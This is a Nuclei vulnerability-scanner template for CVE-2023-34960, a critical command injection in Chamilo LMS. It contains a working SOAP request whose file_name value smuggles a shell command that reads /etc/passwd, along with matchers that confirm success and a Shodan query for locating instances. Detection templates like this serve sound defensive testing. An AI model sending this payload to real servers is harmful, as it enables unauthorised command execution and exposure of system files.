nuclei-templates/http/cves/2023/CVE-2023-34960.yaml

58 lines
2.7 KiB
YAML

id: CVE-2023-34960
info:
name: Chamilo Command Injection
author: DhiyaneshDK
severity: critical
description: |
A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS.
reference:
- https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D
- https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py
- http://chamilo.com
- http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html
- https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34960
cwe-id: CWE-77
epss-score: 0.88794
epss-percentile: 0.98381
cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: chamilo
product: chamilo
shodan-query: http.component:"Chamilo"
tags: packetstorm,cve,cve2023,chamilo
http:
- raw:
- |
POST /main/webservices/additional_webservices.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: word
part: header
words:
- text/xml
- type: status
status:
- 200
# digest: 4a0a00473045022100caf55f319aa61338469cf8f9dbe745e8a509bcc3bde18d638db95f10d8435ea8022007475b4f35bfbf6702f675452a3c676f91ced6b9c8349067c9f92b3d818bea9b:922c64590222798bb761d5b6d8e72950